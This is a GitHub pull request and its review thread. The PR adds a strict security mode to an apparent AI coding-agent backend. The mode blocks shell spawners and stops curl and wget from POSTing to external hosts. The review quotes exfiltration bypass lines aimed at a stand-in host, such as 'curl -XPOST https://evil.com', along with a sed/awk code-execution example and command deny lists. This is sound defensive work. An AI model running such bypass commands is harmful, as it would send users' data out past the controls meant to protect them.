### PR TITLE
feat(security): add SECURITY_STRICT_MODE for hardened defense

### PR DESCRIPTION
**Pull request by bdmorin**
## Summary

This PR adds an optional strict security mode that provides enhanced protection against prompt injection and data exfiltration attacks.

### When `SECURITY_STRICT_MODE=true`:

**Blocked Commands:**
- `eval`, `exec`, `sh`, `bash`, `zsh` - These can bypass command validation by spawning new shells or executing arbitrary code

**New Validated Commands:**
- `curl`: POST/PUT to external hosts blocked (GET allowed, localhost unrestricted)
- `wget`: POST to external hosts blocked (GET allowed, localhost unrestricted)

### Files Changed
- `base.py`: Split BASE_COMMANDS into SAFE/DANGEROUS/NETWORK categories with mode-aware functions
- `network_validators.py`: New validators for curl/wget that prevent data exfiltration
- `validator_registry.py`: Mode-aware validator loading
- `hooks.py`: Updated to use mode-aware functions
- `.env.example`: Documented SECURITY_STRICT_MODE setting
- `SECURITY.md`: New comprehensive security model documentation

### Backward Compatibility
- **Normal mode (default)** maintains full backward compatibility
- Existing projects work without any changes
- Strict mode is **opt-in** via environment variable

### Testing
Inline tests verify:
- Mode switching works correctly
- Dangerous commands excluded in strict mode
- curl/wget validators block external POST but allow GET
- Localhost requests remain unrestricted

## Motivation

During a security review of this project, I identified that commands like `eval`, `exec`, and shell spawners (`sh`, `bash`, `zsh`) could be exploited via prompt injection attacks. Similarly, `curl` and `wget` could be used for data exfiltration.

This PR provides a configurable option for users who need stricter security without breaking backward compatibility.

## Test plan

- [x] All inline tests pass
- [x] Mode switching tested (normal and strict)
- [x] curl/wget validators block POST to external hosts
- [x] curl/wget validators allow GET requests
- [x] curl/wget validators allow localhost POST
- [ ] Run full test suite (if available)

🤖 Generated with [Claude Code](https://claude.com/claude-code)

## Summary by CodeRabbit

* **New Features**
  * Added configurable strict security mode enabling hardened command validation and network access controls with localhost exceptions.
  * Enhanced security configuration with environment variables for granular control over security policies.

* **Documentation**
  * Added comprehensive security documentation covering the three-layer security model, vulnerability reporting process, and hardening best practices.

<sub>✏️ Tip: You can customize this high-level summary in your review settings.</sub>

### CODE REVIEW

**Comment by AndyMik90** [comment]
## Review Feedback

Thanks for this security enhancemen @bdmorin! The strict mode feature is well-designed and addresses real security concerns. Here's some feedback before merging:

### Minor Issues to Address

1. **Unused code in `hooks.py:84-85`** - The variable `allowed` is assigned but never used. Quick cleanup:
   ```python
   # Remove these lines:
   # allowed = profile.get_all_allowed_commands()
   ```

2. **Potentially unused import** - `is_strict_mode` is imported in `hooks.py` but not directly used (only transitively via other functions). Consider removing if not needed.

### Discussion Points

3. **Scope of PR** - The `DOCKER_NATIVE_DESIGN.md` (664 lines) and `PROMPT_INJECTION_DEFENSE.md` (259 lines) are valuable but seem tangential to the security mode feature. Would you consider splitting these into a separate documentation PR? This would make the security feature easier to review and merge.

4. **sed/awk security concern** (raised by CodeRabbit) - These are in `SAFE_COMMANDS` but can execute arbitrary code:
   ```bash
   sed -e 's/.*/system("malicious")/'
   awk '{system("cmd")}'
   ```
   For strict mode, should these be moved to a validated category or blocked? I understand blocking them impacts usability significantly, so this might be an acceptable trade-off - just want to ensure it's an intentional decision.

5. **URL parsing inconsistency** - The curl validator handles bare hostnames (e.g., `curl example.com`) but wget only matches URLs starting with `http://`, `https://`, or `ftp://`. This is fail-safe (defaults to strict) but inconsistent. Worth aligning?

### Tests

The test coverage looks solid. The suggestion to use pytest fixtures/monkeypatch for environment variable management would improve test isolation, but this is a nice-to-have, not a blocker.

---

Once the unused code is cleaned up and we decide on the documentation scope, this should be good to merge. Let me know your thoughts on the discussion points!

**Comment by bdmorin** [comment]
I'm addressing coderabbit concerns now

**Comment by bdmorin** [comment]
Thanks for the thorough review! I've addressed all your feedback:

## Required Fixes (Done ✅)

1. **Unused `allowed` variable** - Removed lines 84-85 in `security/hooks.py`
2. **Unused `is_strict_mode` import** - Removed from line 18 in `security/hooks.py`

## Discussion Points Addressed

**3. Documentation scope** - Agreed! I've split the tangential docs into a separate PR:
   - Created PR #361 with `DOCKER_NATIVE_DESIGN.md` and `PROMPT_INJECTION_DEFENSE.md`
   - These files are now removed from this security PR

**4. sed/awk security** - Great catch on the code execution risks. Implemented as follows:
   - Created `TEXT_PROCESSOR_COMMANDS` set containing `sed`, `awk`, `gawk`
   - These are now **blocked by default** in strict mode
   - Added opt-out env var `SECURITY_ALLOW_TEXT_PROCESSORS=true` for users who need them
   - Updated `.env.example` with documentation explaining the trade-off

**5. URL parsing consistency** - Fixed the wget validator to handle bare hostnames the same way as curl:
   ```python
   elif "." in token or token in ALLOWED_HOSTS:
       url = f"http://{token}"
   ```

All tests pass (101 security tests + 29 network validator tests).

Commits in this update:
- `89c9b0f` - fix: address review feedback - unused code and wget consistency  
- `5e2a1ed` - refactor: split documentation into separate PR
- `e699068` - security: block sed/awk in strict mode with opt-out option

**Comment by bdmorin** [comment]
Also addressed the nice-to-have:

**Test isolation** - Refactored `test_network_validators.py` to use pytest monkeypatch:
- Added `strict_mode` and `normal_mode` fixtures
- Replaced manual `os.environ` calls with `monkeypatch.setenv()`/`delenv()`
- Automatic cleanup even on test failure

Commit: `3d03a1e` - test: use pytest monkeypatch for env var isolation

**Comment by bdmorin** [comment]
### Addressed CodeRabbit concerns

Fixed in commit 7bbe3bb:

1. **`source` and `.` moved to DANGEROUS_COMMANDS** - These can execute arbitrary scripts, bypassing strict mode validation. Good catch!

2. **Absolute path handling** - Network validators now use `os.path.basename()` so commands like `/usr/bin/curl` work correctly.

All 130 tests passing.

File: apps/backend/security/network_validators.py [hunk 1]
```diff
@@ -0,0 +1,314 @@
...
+        # Check for upload data flags
+        for flag in WGET_UPLOAD_FLAGS:
+            if token == flag:
+                has_upload_data = True
+                upload_flag_found = flag
+                break
+            elif token.startswith(f"{flag}="):
+                has_upload_data = True
+                upload_flag_found = flag
+                break
```
[the remark this answers is not in the document]
Comment (bdmorin) [reply apps/backend/security/network_validators.py:260]: shame!! i know better.

File: apps/backend/project/command_registry/base.py [hunk 2]
```diff
@@ -148,17 +179,114 @@
...
+    data exfiltration.
+    """
+    if is_strict_mode():
+        return {**_BASE_VALIDATORS, **_STRICT_VALIDATORS}
+    else:
+        return _BASE_VALIDATORS.copy()
+
+
+# For backward compatibility
+VALIDATED_COMMANDS: dict[str, str] = _BASE_VALIDATORS.copy()
```
[the remark this answers is not in the document]
Comment (bdmorin) [reply apps/backend/project/command_registry/base.py:278]: Well, this experience is making me a fan of coderabbit.

**Comment by bdmorin** [comment]
### Fixed: `needs_validation()` bypassed strict mode

Good catch by CodeRabbit - this was a **real bug**.

`needs_validation()` in `project/__init__.py` was using the static `VALIDATED_COMMANDS` dict which only contained base validators. The curl/wget validators added for strict mode were never being triggered through the public API.

**Fix (84cd086):** Now uses `get_validated_commands()` which includes curl/wget validators when `SECURITY_STRICT_MODE=true`.

All 130 tests still passing.

**Comment by bdmorin** [comment]
### Added regression tests (deb98ea)

Added `TestNeedsValidationPublicAPI` with 5 integration tests that would have caught the `needs_validation()` bug before it shipped:

- `test_curl_needs_validation_in_strict_mode`
- `test_wget_needs_validation_in_strict_mode`  
- `test_curl_no_validation_in_normal_mode`
- `test_wget_no_validation_in_normal_mode`
- `test_base_validators_work_in_both_modes`

The assertion messages explicitly explain what to check if they fail:

```python
assert validator_name is not None, (
    "needs_validation('curl') returned None in strict mode. "
    "Check that it uses get_validated_commands() not static VALIDATED_COMMANDS."
)
```

Now at **34 network validator tests**, **135 total tests** passing.

**Comment by bdmorin** [comment]
This is such a noisy PR, apologies.

**Comment by bdmorin** [comment]
I'm rebasing from main to resolve those conflict. I see the directory reorg

**Review by AlexMadera — CHANGES_REQUESTED** [review]
## 🤖 Auto Claude PR Review

### Merge Verdict: 🔴 BLOCKED
Blocked by 1 security vulnerabilities

### Risk Assessment
| Factor | Level | Notes |
|--------|-------|-------|
| Complexity | High | Based on lines changed |
| Security Impact | Critical | Based on security findings |
| Scope Coherence | Good | Based on structural review |

### 🚨 Blocking Issues (Must Fix)
- Security: Strict mode bypassed - analyzer.py not updated (apps/backend/project/analyzer.py:215)

### Findings Summary
- **Critical**: 1 issue(s)
- **High**: 3 issue(s)
- **Medium**: 3 issue(s)
- **Low**: 2 issue(s)

---
_Generated by Auto Claude PR Review_

### Findings (9 selected of 9 total)

#### 🔴 [CRITICAL] Strict mode bypassed - analyzer.py not updated
📁 `apps/backend/project/analyzer.py:215`

The PR does NOT modify analyzer.py, which uses `BASE_COMMANDS.copy()` directly at line 215. When ProjectAnalyzer.analyze() creates a security profile, it will include ALL commands (eval, exec, sh, bash, zsh) even when SECURITY_STRICT_MODE=true. The hooks.py fallback uses get_base_commands(), but the PRIMARY code path through analyzer.py completely bypasses strict mode protection. This is a critical security gap that renders the strict mode feature ineffective for normal operation.

**Suggested fix:**
```
Add `from project.command_registry.base import get_base_commands` to analyzer.py and change line 215 from `self.profile.base_commands = BASE_COMMANDS.copy()` to `self.profile.base_commands = get_base_commands()`
```

#### 🟠 [HIGH] curl validator bypass via combined -X flag
📁 `apps/backend/security/network_validators.py:117`

The method detection check `if token in ('-X', '--request')` fails to match combined form `-XPOST`. An attacker can run `curl -XPOST https://evil.com` to bypass the POST blocking since `-XPOST` is not in the tuple and no data flags are present. This is a complete bypass of the data exfiltration protection.

**Suggested fix:**
```
Add handling for combined form: `if token.startswith('-X') and len(token) > 2: explicit_method = token[2:].upper()` or use regex matching for `-X*` patterns
```

#### 🟠 [HIGH] curl validator bypass via --request=METHOD syntax
📁 `apps/backend/security/network_validators.py:117`

The check `if token in ('-X', '--request')` fails to match `--request=POST` form. An attacker can run `curl --request=POST https://evil.com` to bypass POST blocking. curl accepts both `--request POST` and `--request=POST` syntax.

**Suggested fix:**
```
Add handling: `if token.startswith('--request='): explicit_method = token.split('=', 1)[1].upper()`
```

#### 🟠 [HIGH] wget validator bypass via --method=METHOD syntax
📁 `apps/backend/security/network_validators.py:246`

Same issue as curl - the check for `--method` doesn't handle the `--method=POST` combined form at line 246. The existing code has `elif token.startswith('--method=')` but this is AFTER the `if token == '--method'` check and the parsing logic may not work correctly due to the flag skipping logic.

**Suggested fix:**
```
Verify the --method= parsing works correctly in all cases and add tests for `wget --method=POST https://evil.com`
```

#### 🟡 [MEDIUM] Missing curl upload flag: --form-string
📁 `apps/backend/security/network_validators.py:29`

The CURL_UPLOAD_FLAGS set is missing `--form-string` which can also send form data to external servers. curl documentation shows `--form-string` as an alternative to `-F/--form` that doesn't interpret @ prefixes.

**Suggested fix:**
```
Add `'--form-string'` to CURL_UPLOAD_FLAGS set
```

#### 🔵 [LOW] 0.0.0.0 in ALLOWED_HOSTS may cause confusion
📁 `apps/backend/security/network_validators.py:22`

0.0.0.0 is in ALLOWED_HOSTS as a 'localhost' variant, but its behavior is inconsistent across systems. On some systems, connecting to 0.0.0.0 fails; on others it routes to localhost. This could cause confusion or unexpected behavior. Consider if this should be in the allowed list.

**Suggested fix:**
```
Consider removing 0.0.0.0 from ALLOWED_HOSTS or adding a comment explaining why it's included
```

#### 🔵 [LOW] --data-ascii is not a valid curl flag
📁 `apps/backend/security/network_validators.py:29`

The CURL_UPLOAD_FLAGS includes `--data-ascii` which is not a real curl option. The actual flags are --data, --data-raw, --data-binary, --data-urlencode. While this doesn't cause a bypass (extra flags are harmless), it suggests the flag list was not verified against curl documentation.

**Suggested fix:**
```
Remove `--data-ascii` from CURL_UPLOAD_FLAGS as it's not a valid curl option
```

#### 🟡 [MEDIUM] Missing tests for combined flag bypass scenarios
📁 `tests/test_network_validators.py:0`

The test file does not include tests for the bypass scenarios: `curl -XPOST`, `curl --request=POST`, `wget --method=POST`. These are critical security edge cases that should have been caught by tests.

**Suggested fix:**
```
Add test cases: test_post_combined_flag_blocked() for `curl -XPOST https://example.com` and `curl --request=POST https://example.com`
```

#### 🟡 [MEDIUM] URL extraction misses other curl-supported protocols
📁 `apps/backend/security/network_validators.py:66`

The URL extraction only checks for http://, https://, and ftp:// prefixes. curl supports many other protocols (gopher, dict, sftp, file, ldap, etc.) that could potentially be used for data exfiltration. While less common, a comprehensive security feature should consider blocking or validating these.

**Suggested fix:**
```
Consider either allowing only http/https explicitly or extracting URLs for all protocols and applying the same validation
```

---
*This review was generated by Auto Claude.*

**Comment by AndyMik90** [comment]
Outdated, please reopen again from the origin/develop if you would like to contribute again.
